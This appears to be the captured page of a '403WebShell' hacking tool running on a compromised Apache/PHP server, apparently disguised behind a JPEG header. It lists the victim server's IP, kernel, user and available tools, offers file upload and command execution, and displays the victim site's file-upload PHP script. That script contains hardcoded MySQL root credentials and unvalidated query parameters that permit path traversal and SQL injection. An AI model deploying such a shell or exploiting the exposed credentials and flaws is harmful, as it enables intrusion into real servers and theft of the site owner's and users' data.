????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.217.114
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/login/login/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www.notes-online.se/login/login//DirUpload.php
<?php
	session_start();
	
	
	function AddPath($PathToCreate){
		$iBreak = 0;
		$iBreak = strrpos($PathToCreate, "/");
		if($iBreak !== FALSE){
			$Parent = substr($PathToCreate, 0, $iBreak);
			if(!@chdir($Parent)){
				AddPath($Parent);
			}
		}
	
		if(!@chdir($PathToCreate)){
			mkdir($PathToCreate);
		}
	}

	$target_encoding = "ISO-8859-1//IGNORE";
	
	$Path = urldecode ($_GET['path']);
	$Date = substr(date("Ymd"),2,6);
	
	$userId = $_GET['userid'];
	$customerId = $_GET['customerid'];
	 
	 
	AddPath("/var/www/notes_files/$customerId/$Path/");
	$i=0;
		
	
	$cookie = "";
	foreach($_FILES as $myFile){
			$clientRelativePath = $_POST["SelectedPath_".$i];
			
		//	$clientRelativePath = iconv("UTF-8", $target_encoding, $clientRelativePath);
			$File = "/var/www/notes_files/$customerId/$Path/".dirname($clientRelativePath)."/";
			
			if(substr($File,strlen($File)-2,1) == "."){
				$File = substr($File,0,strlen($File)-2);
			}
			
			$File = str_replace("å", "a", $File);
			$File = str_replace("ä", "a", $File);
			$File = str_replace("ö", "o", $File);
			$File = str_replace("Å", "A", $File);
			$File = str_replace("Ä", "A", $File);
			$File = str_replace("Ö", "O", $File);
			
			AddPath($File);
			
			$cookie .=  $Path."/". $filename."<br>";
			$filename = str_replace("&", "_and_", $File.$myFile['name']);
			$filename = str_replace("å", "a", $filename);
			$filename = str_replace("ä", "a", $filename);
			$filename = str_replace("ö", "o", $filename);
			$filename = str_replace("Å", "A", $filename);
			$filename = str_replace("Ä", "A", $filename);
			$filename = str_replace("Ö", "O", $filename);
	
			
		//	$filename = str_replace("&", "_and_", $File.iconv("UTF-8", $target_encoding, $myFile['name']));
			move_uploaded_file($myFile['tmp_name'], $filename);
			
			
		
			$i++;
	}
	
	$_SESSION['listoffiles'] = $cookie;
	
	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("notes");
	
	$sql = "INSERT INTO tblActionLog VALUES(null,$userId,'Uploading files to server','".date("Y-m-d H:i:s")."')";
	$result = mysql_query($sql);

?>

Youez - 2016 - github.com/yon3zu
LinuXploit